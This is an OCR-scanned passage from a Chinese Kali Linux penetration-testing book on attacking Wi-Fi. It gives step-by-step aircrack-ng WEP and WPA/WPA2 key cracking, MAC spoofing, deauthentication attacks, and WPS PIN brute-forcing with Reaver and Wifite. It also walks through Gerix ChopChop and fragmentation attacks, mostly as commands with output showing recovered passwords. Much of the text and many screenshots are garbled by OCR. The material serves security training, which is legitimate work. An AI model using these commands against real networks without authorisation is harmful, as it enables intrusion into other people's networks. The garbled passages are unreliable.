airodump-ng 界面 查看 ， 可 以 看 到 Test 的 Frames 栏 的 数字 在 飞速 的 递增 。 在 抓 取 的 无 线 数 
据 报 文 达到 了 一 定数 量 后 ， 一 般 都 是 指 IVsX 值 达到 2 万 以 上 时 ， 就 可 以 开始 破解 ， 若 不 
能 成 功 就 等 待 数据 包 文 继续 抓 取 ， 然 后 多 党 试 几 次 。 

(8) 使 用 Aircrack 人 破解 密码 。 执 行 命令 如 下 所 示 : 


root@kali:~# aircrack-ng -b 14:E6:E4:AC:FB:20 wirelessattack-01.cap 
Opening wirelessattack-01.cap 
Attack will be restarted every 5000 captured ivs. 
Starting PTW attack with 7197 ivs. 
Aircrack-ng 1.2 beta1 


i 
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[00:00:54] Tested 15761 keys (got 10002 IVs) 

KB depth X byte(vote) 

O 0/4 61(17408) BA(16384) 9B(15616) E1(15616) 28(15104) 77(14592) 10(14336) 
1 1/5 62(15360)66(14336) 3C(14080) 76(14080) 5E(13568) 23(13312) 25(13312) 
2 2/13 63(14336) 11(14336) 7A(13824) AA(13824) A9(13568) 5D(13568) 7E(13312) 
3 3/ 7 EF(14336)38(14080) 3E(14080) 8A(14080) D9(14080) DE(14080) 6E(13824) 
4 9/10 65(13824) 36(13568) 42(13568) 8B(13568) BF(13568) 29(13312) 7F(13312) 

KEY FOUND! [ 61:62:63:64:65 ] (ASCII: abcde ) 
Decrypted correctly: 10096 


从 输出 的 结果 中 可 以 看 到 KEY FOUND， 表 示 密 码 已 经 找到 ， 为 abcde。 
9.2.2 破解 WPA/WPA2 无 线 网 络 


WPA 全 名 为 Wi-Fi Protected Access， 有 WPA 和 WPA2 两 个 标准 。 它 是 一 种 保护 无 线 
电脑 网 络 安全 的 协议 。 对 于 局 用 WPA/WPA2 加 蜜 的 无 线 网 络 ， 其 攻击 和 破解 步骤 及 攻击 
是 完全 一 样 的 。 不 同 的 是 ， 在 使 用 airodump-ng 进行 无 线 探测 的 界面 上 ， 会 提示 为 WPA 
CCMP PSK。 当 使 用 aireplay-ng 进行 攻击 后 ， 同 样 获取 到 WPA 握手 数据 包 及 提示 ; 在 破 
解 时 需要 提供 一 个 密码 字典 。 下 面 将 介绍 破解 WPA/WPA2 无 线 网 络 的 方法 。 

使 用 aircrack-ng 破解 WPA/WPA2 无 线 网 络 的 具体 操作 步骤 如 下 所 示 。 

(1) 查看 无 线 网 络 接口 。 执 行 命令 如 下 所 示 : 


kali:~# airmon-ng 


Interface Chipset Driver 

wlan0 Ralink RT2870/3070 rt2800usb - [phy1] 

(2) 停止 无 线 网 络 接口 。 执 行 命令 如 下 所 示 : 

root@kali:~# airmon-ng stop wlanO # 停 止 wlan0 接口 
Interface Chipset Driver 

wlanO Ralink RT2870/3070 rt2800usb - [phy1] 


(monitor mode disabled) 


(3) 修改 无 线 网 卡 MAC 地 址 。 执 行 命令 如 下 所 示 : 


root@kali:~# macchanger --mac 00:11:22:33:44:55 wlan0 
Permanent MAC: 00:c1:40:76:05:6c (unknown) 

Current MAC: 00:c1:40:76:05:6c (unknown) 

New MAC: 00:11:22:33:44:55 (Cimsys Inc) 


(4) 启用 无 线 网 络 接口 。 执 行 命令 如 下 所 示 : 


root@kali:~# airmon-ng start wlan0 

Found 3 processes that could cause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 


-e 
PID Name 

2567 NetworkManager 

2716 dhclient 

15609 wpa supplicant 

Interface Chipset Driver 

wlanO Ralink RT2870/3070 rt2800usb - [phy1] 


(monitor mode enabled on monO) 
(50 捕获 数据 包 。 执 行 命 令 如 下 所 示 : 


A 
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root@kali:~# airodump-ng -c 1 -w abc --bssid 14:E6:E4:AC:FB:20 monO 
CH 1 ][ Elapsed: 3 mins ][ 2014-05-15 17:53 ][ WPA handshake: 14:E6:E4:AC:FB:20 


BSSID PWR RXQ Beacons #Data,#/s CH MB ENC CIPHER AUTH ESSID 


14:E6:E4:AC:FB:20 -47 0 1979 5466 24 1 54e. WPA2 CCMP PSK Test 


BSSID STATION PWR Rate Lost Frames Probe 
14:E6:E4:AC:FB:20 18:DC:56:F0:62:AF -127 0e-0e 0 481 
14:E6:E4:AC:FB:20 08:10:77:0A:53:43 -32 0-1 40 5035 
14:E6:E4:AC:FB:20 08:10:77:0A:53:43 -30 0-1 46 5039 


(6) XIR HH a Test 进行 Deauth 攻击 。 执 行 命令 如 下 所 示 : 


root@kali:~# aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33: 44:55 mon0 
17:50:27 Waiting for beacon frame (BSSID: 14:E6:E4:AC:FB:20) on channel 1 
17:50:30 Sending 64 directed DeAuth. STMAC: [00:11:22:33:44:55] [12/59 ACKs] 


CI) 破解 密码 。 执 行 命令 如 下 所 示 : 


root@Kali:~# aircrack-ng -w ./dic/wordlist wirelessattack-01.cap 
Opening wirelessattack-01.cap 


Read 2776 packets. 
# BSSID ESSID Encryption 
1 14:E6:E4:AC:FB:20 Test WPA (1 handshake) 


Choosing first network as target. 
Opening abc-01.cap 
Reading packets, please wait... 
Aircrack-ng 1.2 beta1 
[00:04:50] 1 keys tested (500.88 k/s) 
KEY FOUND! [ daxueba ] 
Master Key : B2 51 6F 21 66 D5 19 8F 40 F8 9E 97 41 EO 85 81 
51 69 8F 1C AO CA A8 5B 59 58 BD F2 06 34 8B F2 
Transient Key : AA 7B 30 94 92 EC CE 63 EB FO 28 84 00 8A 74 0A 
FF 6A 00 15 B7 18 01 47 AO BF 78 9D 9C 23 8B 8E 
OB 7C 73 52 DF 35 CB C9 30 22 9E FB 94 A2 9B 1A 
F2 41 02 66 A1 16 5B 79 74 FB OB ED 97 E2 94 12 
EAPOL HMAC .:88 FC 8B 09 41 7C 67 8C 75 61 F7 45 CB 88 F6 BF 


从 输出 的 信息 中 可 以 看 到 无 线路 由 器 的 密码 已 经 成 功 破 解 。 在 KEY FOUND 提示 的 右 
侧 可 以 看 到 密码 已 被 破解 出 ， 为 daxueba， 破 解 速度 约 为 500.88 k/s. 


9.2.3 攻击 WPS (Wi-Fi Proteced Setup) 


WPS 是 由 Wi-Fi 联盟 所 推出 的 全 新 Wi-Fi 安全 防护 设 定 标准 。 该 标准 主要 是 为 了 解决 
无 线 网 络 加 密 认 证 设 定 的 步骤 过 于 繁杂 的 弊病 。 因 为 通 单 用户 往往 会 因为 设置 步骤 太 态 烦 ， 
以 至 于 不 做 任何 加 密 安 全 设 定 ， 从 而 引起 许多 安全 上 的 问题 。 所 以 很 多 人 使 用 WPS 设置 
无 线 设 备 ， 可 以 通过 个 人 识别 码 (PIN) 或 按钮 (PBC) 取代 输入 一 个 很 长 的 密码 短语 。 当 
开局 该 功能 后 ， 攻 击 者 就 可 以 使 用 暴力 攻击 的 方法 来 攻击 WPS。 本 小 节 将 介绍 使 用 各 种 工 
具 攻 击 WPS. 

现在 大 部 分 路 由 占 上 都 文 持 WPS 功能 。 以 前 路 由 器 有 专门 的 WPS 设置 ， 现 在 的 路 由 
器 使 用 QSS 功能 取代 了 。 这 里 以 TP-LINK 型 号 为 例 ， 介 绍 设 置 WPS 功能 ， 如 图 9.15 所 
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ze 如果 使 用 WPS 的 PBC 方式 ， 只 需要 按 下 路 由 器 上 的 QSS/RESET 按钮 就 可 以 了 。 


Qss 功 能 : 已 开启 
当前 PIN 吧 : 04588306 恢复 初始 PIN 码 | | 产生 新 的 PIN 码 
添加 新 设备 Miss 


图 9.15 设置 WPS 


从 该 界面 可 以 看 到 QSS 功能 已 开启， 可 以 看 到 当前 的 PIN tH 04588306。 这 里 可 以 
重新 生成 新 的 PIN 码 ， 或 者 恢复 初始 PIN f. 

【实例 9-1】 使 用 Reaver 破解 WPS。 具 体操 作 步 骤 如 下 所 示 。 

CI) 插入 无 线 网 卡 ， 使 用 ifconfig 命令 查看 无 线 网 卡 是 否 已 经 正确 插入 。 执 行 命令 如 
下 所 示 : 


root@Kali:~# ifconfig 
ethO Link encap:Ethernet HWaddr 00:19:21:3f:c3:e5 
inet addr:192.168.5.4 Bcast192.168.5.255 Mask:255.255.255.0 
inet6 addr: fe80::219:21ff:fe3f:c3e5/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:10541 errors:0 dropped:0 overruns:0 frame:0 
TX packets:7160 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen: 1000 
RX bytes:4205470 (4.0 MiB) TX bytes:600691 (586.6 KiB) 
lo Link encap:Local Loopback 
inet addr:127.0.0.1 Mask:255.0.0.0 
inet6 addr: ::1/128 Scope:Host 
UP LOOPBACK RUNNING . MTU:65536 Metric:1 
RX packets:296 errors:0 dropped:0 overruns:0 frame:0 
TX packets:296 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 
RX bytes:17760 (17.3 KiB) TX bytes:17760 (17.3 KiB) 


从 输出 的 信息 中 可 以 看 到 ， 只 有 一 个 以 太 网 接口 eth0。 这 是 因为 无 线 网 卡 可 能 没有 局 
动 ， 背 先 来 局 动 该 无 线 网 卡 。 执 行 命令 如 下 所 示 : 
root@Kali:~# ifconfig wlan0 up 


执行 以 上 命令 后 ， 没 有 任何 信息 输出 。 此 时 再 次 执行 ifconfig 命令 ， 碍 看 无 线 网 络 是 
AOA, W rn: 
root@Kali:~# ifconfig 


wlanO Link encap:Ethernet  HWaddr 08:10:76:49:c3:cd 
UP BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen: 1000 
RX bytes:0 (0.0 B) TX bytes:O (0.0 B) 


看 到 以 上 输出 信息 ， 则 表示 无 线 网 卡 已 成 功 局 动 ， 其 网 络 接口 为 wlan0。 
(2) 局 动 无 线 网 卡 为 监听 模式 。 执 行 命令 如 下 所 示 : 
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root@kali:~# airmon-ng start wlan0 

Found 3 processes that could cause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 


-e 
PID Name 

2618 NetworkManager 

28/0 wpa supplicant 

27052 dhclient 

Interface Chipset Driver 

wlanO Ralink RT2870/3070 rt2800usb - [phy16] 


(monitor mode enabled on monO) 


从 输出 的 信息 中 ， 可 以 看 到 monitor mode enabled on mon0， 表 示 无 线 网 卡 已 月 动 监 听 
模式 。 在 以 上 信息 中 ， 还 可 以 看 到 无 线 网 卡 的 必 片 级 驱动 类 型 。 其 中 ， 访 网卡 的 必 卢 为 
Ralink, ERA IKZ Jj rt2800usb. 


DER: 执行 以 上 命令 启动 监听 模式 , 一 定 要 确定 正确 识别 无 线 网 卡 的 芯片 和 了 驱动。 否则 ， 
该 无 线 网 卡 可 能 导致 攻击 失败 . 


(3) 攻击 WPS。 执 行 命令 如 下 所 示 : 


root@kali:~# reaver -i monO -b 14:E6:E4:AC:FB:20 -vv 
Reaver v1.4 WiFi Protected Setup Attack Tool 
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@ tacnetsol.com> 
[+] Waiting for beacon from 14:E6:E4:AC:FB:20 

[+] Switching monO to channel 1 

[+] Switching monO to channel 2 

[+] Switching monO to channel 3 

[+] Switching monO to channel 11 

[+] Switching monO to channel 4 

[+] Switching monO to channel 5 

[+] Switching monO to channel 6 

[+] Switching monO to channel 7 

[+] Associated with 8C:21:0A:44:09:F8 (ESSID: yztxty) 
[+] Trying pin 12345670 

[+] Sending EAPOL START request 

[+] Received identity request 

[+] Sending identity response 

[+] Received identity request 

[+] Sending identity response 

[+] Received M1 message 

[+] Sending M2 message 

[+] Received M3 message 

[+] Sending M4 message 

[+] Received WSC NACK 

[+] Sending WSC NACK 


从 以 上 输出 信息 中 , 可 以 看 到 正在 等 待 连接 到 14:E6:E4:AC:FB:20 LR EH i HI fa o 
并 且 通 过 发 送 PIN 信息 ， 获 取 密 码 。 

如 果 没 有 路 由 器 没有 开局 WPS 的 话 ， 将 会 出 现 如 下 所 示 的 信息 : 

山 WARNING: Failed to associate with 14:E6:E4:AC:FB:20 (ESSID: XXXX) 


Fern WiFi Cracker 是 一 个 非常 不 错 的 工具 ， 用 来 测试 无 线 网 络 安 人 全。 后 面 将 会 介绍 使 
用 该 工具 ， 攻 击 Wi-Fi 网 络 。 这 里 首先 介绍 使 用 Fern WiFi Cracker 工具 来 攻击 WPS. 
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【实例 9-2】 使 用 Wifite 攻击 WPS。 具 体操 作 步 又 如 下 所 示 。 
CD 启动 Wifite 工具 ， 并 指定 使 用 common.txt 密码 字典 。 在 命令 行 终 端 执行 如 下 所 示 
的 命令 


root@kali:~# wifite -dict common.txt 


执行 以 上 命令 后 ， 将 显示 如 下 所 示 的 信息 : 


MS: Ee a ” WiFite v2 (r85) 
Dont () E E E automated wireless auditor 
it d ' mu aod uy 
ETE I ; 47 designed for Linux 
F / \ Ej 
/ \ 


[+] WPA dictionary set to common.txt 
[+] scanning for wireless devices... 
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready. 
[0:00:14] scanning wireless networks. 0 targets and 1 client found 
以 上 信息 显示 了 WiFite 工具 的 版 本 信息 ， 文 持平 台 ， 并 且 开 始 扫描 无 线 网 络 。 当 扫 搞 
到 想 要 破解 的 无 线 网 络 时 ， 按 下 CTRL+C 2B 6 Sf 1E TH fh 
(2) 停止 扫描 无 线 网 络 ， 将 显示 如 下 所 示 的 信息 : 


[+] scanning (monO), updates at 5 sec intervals, CTRL+C when ready. 


NUM ESSID CH ENCR POWER WPS? CLIENT 
1 yzty 11 WPA2  65db wps 
2 Test 1 WPA2 = 52db wps 
3 CMCC-AUTO 1 WPA2 29db no 
4 CMCC-LIU 6 WPA2 28db wps 
5 TP-LINK D7118A 1 WPA2  -13db wps clients 


[0:00:37] scanning wireless networks. 5 targets and 3 clients found 
[+] checking for WPS compatibility... done 


NUM ESSID CH ENCR POWER WPS? CLIENT 
1 yzty 11 WPA2  65db wps 
2 Test 1 WPA2  Á 52db wps 
3 CMCC-AUTO 1 WPA2  29db no 
4 CMCC-LIU 6 WPA2  28db wps 
5  TP-LINK D7118A 1 WPA2  -13db wps clients 


[+] select target numbers (1-5) separated by commas, or ‘all’: 


MW ES dfe rh. AUA $0568 8] TL 76 BEN URL 2) i FEF a AHP, 
共 显 示 了 7 列 。 分 别 表示 无 线 接 入 点 编号 、ESSID 5. (S38. WEDA, PAD. FEAF 
局 wps AIA Pit) WRIA AS PO in Ee BTC BEAL Vl] CLIENT 列 显示 是 client. 
aW SAP MERE TE, WAN ze clients. 

(3) 此 时 ， 选 择 要 攻击 的 无 线 接 入 点 。 这 里 选择 第 五 个 无 线 接 入 点 ， 输 入 “1”。 然 
后 按 下 回 车 键 将 开始 攻击 ， 显 示 信 息 如 下 所 示 : 


[+] select target numbers (1-5) separated by commas, or ‘all’: 1 
[+] 1 target selected. 
[0:00:00] initializing WPS PIN attack on yzty (EC:17:2F:46:70:BA) 
[0:11:00] WPS attack, 0/0 success/ttl, 
[!] unable to complete successful try in 660 seconds 
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[+]. skipping yzty 
[0:08:20] starting wpa handshake capture on "yzty" 
[0:08:11] new client found: 18:DC:56:F0:62:AF 
[0:08:09] listening for handshake... 
[0:00:11] handshake captured! saved as "hs/yzty EC-17-2F-46-70-BA.cap" 
[+] 2 attacks completed: 
[+] 1/2 WPA attacks succeeded 
yzty (EC:17:2F:46:70:BA) handshake captured 
saved as hs/yzty_EC-17-2F-46-70-BA.cap 


[*] starting WPA cracker on 1 handshake 
[0:00:00] cracking yzty with aircrack-ng 
[+] cracked yzty (EC:17:2F:46:70:BA)! 
[*] key: "huolong5" 

[*] quitting 


从 得 出 的 信息 中 ， 可 以 看 到 破解 出 yzty 无 线 设 备 的 密 公 为 huolong5。 
9.3 Gerix Wifi Cracker 破解 无 线 网 络 


Gerix Wifi Cracker 是 另 一 个 aircrack 图 形 用 户 界 面 的 无 线 网 络 破 解 工具 。 本 节 将 介绍 
使 用 该 工具 破解 无 线 网 络 及 创建 假 的 接 入 点 。 


9.3.1 Gerix 破解 WEP 加 密 的 无 线 网 络 


在 前 面 介绍 了 手动 使 用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加 密 的 无 线 网 络 。 为 了 
方便 ， 本 小 节 将 介绍 使 用 Gerix 工具 自动 地 攻击 无 线 网 络 。 使 用 Gerix 攻击 WEP 加 密 的 无 
线 网 络 。 具 体操 作 步 又 如 下 所 示 。 

(1) Fax Gerix 软件 包 。 执 行 命令 如 下 所 示 : 


root@kali:~# wget https://bitbucket.org/SKin36/gerix-wifi-cracker-pyqt4/ downloads/gerix-wifi- 
cracker-master.rar 

--2014-05-13 09:50:38- —https://bitbucket.org/SKin36/gerix-wifi- cracker- pyqt4/downloads/gerix- 
wifi-cracker-master.rar 

正在 解析 主机 bitbucket.org (bitbucket.org)... 131.103.20.167, 131.103.20.168 

正在 连接 bitbucket.org (bitbucket.org)|131.103.20.167|:443... 已 连接 。 

已 发 出 HTTP 请 求 ， 正 在 等 待 回应 … 302 FOUND 

位 置 : http://cdn.bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/downloads/ gerix-wifi-cracker-master. 
rar [跟随 至 新 的 URL] 

--2014-05-13 09:50:40-- —_http://cdn.bitbucket.org/Skin36/gerix-wifi- cracker-pyqt4/downloads/ 
gerix-wifi-cracker-master.rar 

正在 解析 主机 cdn.bitbucket.org (cdn.bitbucket.org)... 54.230.65.88, 216.137. 55.19, 54.230. 
07 290 —— 

正在 连接 cdn.bitbucket.org (cdn.bitbucket.org)|54.230.65.88|:80... 已 连接 。 

已 发 出 HTTP 请 求 ， 正 在 等 待 回 应 ... 200 OK 

长 度 : 87525 (85K) [binary/octet-stream] 

正在 保存 至 : “gerix-wifi-cracker-master.rar” 
100%[======================================>] 87,525 177K/s 用 时 0.5s 
2014-05-13 09:50:41 (177 KB/s) - 已 保存 “gerix-wifi-cracker-master.rar” [87525/87525]) 


从 输出 的 结果 可 以 看 到 gerix-wifi-cracker-master.rar 文件 已 下 载 完成 ， 并 保存 在 当前 目 
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(2) 解压 Gerix 软件 包 。 执 行 命令 如 下 所 示 : 


root@kali:~# unrar x gerix-wifi-cracker-master.rar 
UNRAR 4.10 freeware Copyright (c) 1993-2012 Alexander Roshal 


Extracting from gerix-wifi-cracker-master.rar 


Creating — gerix-wifi-cracker-master OK 
Extracting  gerix-wifi-cracker-master/CHANGELOG OK 
Extracting  gerix-wifi-cracker-master/gerix.png OK 
Extracting gerix-wifi-cracker-master/gerix.py OK 
Extracting gerix-wifi-cracker-master/gerix.ui OK 
Extracting gerix-wifi-cracker-master/gerix.ui.h OK 
Extracting gerix-wifi-cracker-master/gerix_config.py OK 
Extracting gerix-wifi-cracker-master/gerix_config.pyc OK 
Extracting gerix-wifi-cracker-master/gerix_gui.py OK 
Extracting gerix-wifi-cracker-master/gerix_gui.pyc OK 
Extracting gerix-wifi-cracker-master/gerix_wifi_cracker.png OK 
Extracting gerix-wifi-cracker-master/Makefile OK 
Extracting gerix-wifi-cracker-master/README OK 
Extracting gerix-wifi-cracker-master/README-DEV OK 
All OK 


以 上 和 输出 内 容 显 示 了 解压 Gerix 软件 包 的 过 程 。 从 该 过 程 中 可 以 看 到 ， 解 压 出 的 所 有 


文件 及 保存 位 置 。 
(3) 为 了 方便 管理 ， 将 解压 出 的 gerix-wifi-cracker-masger 目录 移动 Linux 系统 统 
目录 /usr/share 中 。 执 行 命令 如 下 所 示 : 


root@kali:~# mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker 
执行 以 上 命令 后 不 会 有 任何 输出 信息 。 
(4) 切换 到 Gerix 所 在 的 位 置 ， 并 局 动 Gerix 工具 。 执 行 命令 如 下 所 示 : 


root@kali:~# cd /usr/share/gerix-wifi-cracker/ 
root@kali:/usr/share/gerix-wifi-cracker# python gerix.py 


执行 以 上 命令 后 ， 将 显示 如 图 9.16 所 示 的 界面 。 
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Gerix wifi cracker maT x 


A 
Welcome | Configuration | WEP | WPA Fake AP | Cracking Database Credits | 


Gerix 


racker 


Hello and Welcome! 
Gerix Wifi Cracker is a GUI that can help you to work in Wireless 802.11 Penetration Test. 
Created by Emanuele “emgent Gentili and Emanuele " crossbower" Acri from Gerix.IT com 
enJoy! 


09:51:41 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 


Gerix IT 52:55. 


图 9.16 Gerix 启动 界面 


HY 
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(5 六 从 该 界面 可 以 看 到 Gerix 数据 库 已 加 载 成 功 。 此 时 ， 用 鼠标 切换 到 Configuration 
选 天 卡 上 ， 将 显示 如 图 9.17 所 示 的 界面 。 


Gerix wifi cracker 


= for session files (Logs, .cap, . 


/root/.gerix-wifi-cracker/ Jrootlgerix-wificracker/ 中 Clean old session files 


Select the interface: 


| Interfece | MAC | Sipes: | Driver 


| Reload wireless interfaces wireless interfaces Set random MAC address | Set random MAC address | | Enable/Disable Monitor Mode 


Select the target network: 


Channel | Signal | 


Channel: | all channels 2 | Seconds: ho | | Rescan networks 


ii» 


14:02:37 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 


Gerix IT 55:55. 


图 9.17 基本 设置 界面 


(6) 从 该 界面 可 以 看 到 只 有 一 个 无 线 接口 。 所 以 ， 现 在 要 进行 一 个 配置 。 在 该 界面 选 
择 接 口 wlan1， 单 击 Enable/Disable Monitor Mode 按钮 ， 将 显示 如 图 9.18 所 示 的 界面 。 


Gerix wifi cracker 


ome | Configuration 


Directory for session files (Logs, .cap, ...): 
/root/.gerix-wifi-cracker/ | Clean old session files 
Select the interface: 


Interfece —— MAC Chipset | Driver 
‘7... (Ralink RT28... [PEZ BOO; Ta 


Ralink RT28... rt2800usb . es odiar 


Reload wireless interfaces wireless interfaces | | Set random MAC address Set random MAC address | | Enable/Disable Monitor Mode 


Select the target network: 


Channel | Signal 


Channel: | all channels 2 | Seconds: ho 向 | Rescan networks 


p 


14:11:45 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 
14:11:56 - Monitor on: wlan1 [Success] 


Gerix IT 53:55. 


图 9.18 启动 wlanl 为 监听 模式 


"283 * 


第 3 篇 各 种 渗透 测试 


(77) 从 该 界面 可 以 看 到 wlanl 成 功 局 动 为 监听 模式 。 此 时 使 用 鼠标 选择 mon0, 在 Select 
the target network 下 单 击 Rescan networks 按钮 ， 显 示 的 界面 如 图 9.19 Aras. 


Gerix wifi cracker 


ome | Configuration WEP WPA | Fake AP Cracking | Databa: 


Directory for session files (Logs, .cap, ...): 


/root/.gerix-wifi-cracker/ | Clean old session files 


Select the interface: 


| Interfece 


| MAC Chipset | Driver | Mode | 


Reload wireless interfaces | | Set random MACaddress | Enable/Disable Monitor Mode 


Select the target network: 


|WPA2WPA... | 


weEP WEP 


Channel: |all channels ¢ | Seconds: | Rescan networks 


_B 


12:52:55 - database reloaded: /root/.gerix-wifi-crecker/key-database.db [Success] 
12:53:13 - Monitor on: wlan1 [Success] 
12:53:31 - rescan networks [Success] 


Gerix IT.55:25.. 


图 9.19 扫描 到 的 网 络 


(8) 从 该 界面 可 以 看 到 扫描 到 附近 的 所 有 无 线 网 络 。 本 例 中 选择 攻击 WEP 加 密 的 无 
线 网 络 ， 这 里 选择 Essid 为 Test 的 无 线 网 络 。 然 后 将 鼠标 切换 到 WEP 选项 卡 ， 如 图 9.20 
所 示 。 


Gerix wifi cracker 
Welcome | Configuration | WEP | WPA Fake AP | Cracking | Database | Credits. 


Welcome in WEP Attacks Control Panel 


General functionalities 


WEP Attacks (no-client) 


WEP Attacks (with clients) 


WEP Attack (with clients, in Access Point and Ad-Hoc mode) 


Caffe-Latte attack in access point mode 
Start Caffe-Latte attack 
Hirte attack in access point mode 


Hirte attack in ad-hoc mode 


14:11:45 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 
14:11:56 - Monitor on: wlan1 [Success] 


GeriX IT 55:55. 


图 9.20 WEP 配置 
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(9) 该 界面 用 来 配置 WEP 相关 信息 。 单 击 General functionalities 命令 ， 将 显示 如 图 
9.21 所 示 的 界面 。 


Gerix wifi cracker pe EN " 
| Welcome | Configuration | WEP | WPA | Fake AP | Cracking | Database | Credits | 


Welcome in WEP Attacks Control Panel 


General functionalities 


Functionalities 


Start Sniffing and Logging | 


Tests 


Performs a test of injection AP | 


WEP Attacks (no-client) 


WEP Attacks (with clients) 


WEP Attack (with clients, in Access Point and Ad-Hoc mode} 


12:52:55 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 


12:53:31 - rescan networks [Success] 


Gerix 7.22: 


security solutions 


图 921 General functionalities 界面 


(10) 访 界面 显示 了 WEP 的 攻击 方法 。 在 该 界面 的 Functionalities F, 单 击 Start Sniffing 
and Logging 按钮 ， 将 显示 如 图 9.22 所 示 的 界面 。 


(11) 该 界面 显示 了 与 Test 传输 数据 的 无 线 AP。 然 后 在 图 9.21 中 单 击 WEP Attacks 
(no-client) 命令 ， 将 显示 如 图 9.23 所 示 的 界面 。 


Gerix wifi cracker mm T x | 


Welcome | Configuration | WEP | WPA | Fake AP | Cracking Database | Credits | 


Welcome in WEP Attacks Control Panel 


General functionalities 


WEP Attacks (no-client) 


ChopChop attack 


Start false access point Authentication on victim 


Start the ChopChop attack 


Create the ARP packet to be injected on the victim access point 


Inject the created packet on victim access point 


Fragmentation attack 


E 


Associate with AP using fake auth 
sniff dump --bssid 14:E6:E4:AC:FB:20 monO; read; | .inix 


WEP Attacks (with clients) 
CH 1 ][ Elapsed: 29 mins ][ 2014-05-13 13:33 


WEP Attack (with clients, in Access Point and Ad-Hoc mode) 
BSSII PWR RXQ Beacons sata, #/s CH MB ENC CIPHER AUTH E 


14;EB:E4;RC;FB:20 -40 Q 17012 26390 0 


Gde, WEP WEP OPN T 13:02:17 - database reloaded: /root/. gerix-wifi-cracker/key-database.db [Success] 
RSSID Rat 13:02:36 - rescan networks [Success] 
133 sate ost rames ro JẸ 

13:03:47 - 
0 0-1 ? 


= é 13:03:56 - 
54e- 1e 3255 


STATION PUR 


14:EE:E4:RC;FB:20 00:01:40: 76:05s6C 
14:EE:E4:RC:FB:20 18:DC:56:F0:62:AF -36 


Sniffing and Logging started with monO 
WEP: Iniection test with monO 


Gerix ma: 


security solutions 


图 9.22 ”捕获 无 线 AP 图 9.23 ChopChop attack 


(12) 在 该 界面 单 击 Start false access point Authentication on victim 按钮 , 没有 任何 输出 


d TE 
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xu 


Hd. Ria fili Start the ChopChop attack 按钮 ， 将 显示 如 图 9.24 所 示 的 界面 。 
(13) 该 界面 是 抓 取 数 据 包 的 过 程 。 当 捕获 到 无 线 AP 时 ， 将 显示 Use this packet?。 此 
时 输入 y 将 开始 捕获 数据 ， 生 成 一 个 名 为 .cap 文件 ， 如 图 9.25 所 示 。 


bash -c "aireplay-ng -4 =h 08:10:77:0A:53:43 mon! — 1 = 


one) | xor = 34 pt = 00 | 1085 frames written in 18589ms 
- c Sen 3 current guess; 32... 


bash -c "aireplay-ng -4 -h 00:C1:40:76:05:6C mon | 3| = s to drop pac unitis 
i ar Jor Karo eager 


Read 5708 packets, 


size; 116, FromDs; 1, ToDS; (WEP) CV checksum verification FAILED! Trying workaround, 


200200200216 


3 p packets shorter th 
18: DC :56:F0:62 tAF mound? IP E ERE 


: 0842 0000 3333 0000 0016 14e6 eda 


[| 

[| 

| is most like.y invalid/u 
ather one, 

Uy 

{ 

{ 

{ 


se this packet ? y 


图 9.24 捕获 的 数据 包 图 9.25 生成 .cap 文件 


(14) 从 该 界面 可 以 看 到 将 捕获 到 MOL replay dec-0514-162307.cap 文件 中 ， 
该 文件 用 于 攻击 的 时 候 使 用 。 在 图 9.25 中 ， 可 能 会 出 现 如 图 9.26 所 示 的 错误 。 


bash -c "aireplay-ng -4 -h 00:C1:40:76:05:6C mon | — | = 


图 9.26 ChopChop attack 失败 


当 出 现 以 上 错误 时 ， 建 议 换 一 块 无 线 网 卡 。 然 后 在 图 9.23 中 依次 单 击 Create the ARP 
packet to be injected on the victim access point 和 Inject the created packet on victim access 


point 按钮 ， 将 打开 如 图 9.27 所 示 的 界面 。 


output_FORGED monO; read; " ess laal Sh aS 


Mo source MAC (-h) specified, Using the device HAC (00:01:40: 76:05;6C ) 
Sizes 68, FromD5t Ò, ToDS: 1 (WEP) 


FFSFFsFFSFFSFF SPF 
OÔ C1t:40t75: +05+ * BC 


Use this packet ? y 


图 9.27 是 否 使 用 该 数据 包 
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C15) 在 该 界面 询问 是 否 Use this packet?。 在 Use this packet? FA y, 将 大 量 的 抓 取 
数据 包 。 当 捕 获 的 数据 包 达 到 2 万 时 , 单 击 Cracking 选项 卡 , 将 显示 如 图 9.28 所 示 的 界面 


Gerix wifi cracker 


Welcome in rnd E Control Panel 
WEP cracking 


WPA bruteforce cracking 


WPA rainbow tables cracking 


Rainbow Tables cracking 


(Get rainbow tables from http://www.renderlab.net/projects/WPA-tables/ ) 
Add your rainbow tables file: 


Crack the password with coWPAtty and Rainbow Tables 


14:11:45 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 
14:11:56 - Monitor on: wlanl [Success] 


14:25:11 - rescan networks [Success] 


Gerix IT 55:5: 


security solutions 
图 9.28 攻击 界面 
(16) 在 该 界面 单 击 WEP cracking， 将 显示 如 图 9.29 所 示 的 界面 。 


Gerix wifi cracker 


| A | Fake AP | Cracking 
Welcome in Cracking Control Panel 
WEP cracking 


Normal cracking 


When you have enougth packets (»5000) you can try to decrypt the password 


Aircrack-ng - Decrypt WEP password 


WPA bruteforce cracking 


WPA rainbow tables cracking 


13:13:45 - Fragmentation attack: Inject arp packet with monO 
13:14:14 - Fragmentation attack: ARP packet created 


13:14:34 - Cracking WEP with aircrack launched (remember to save database's changes) 


GeriX IT 52:2: 


security solutions 


9.29 破解 WEP #4 
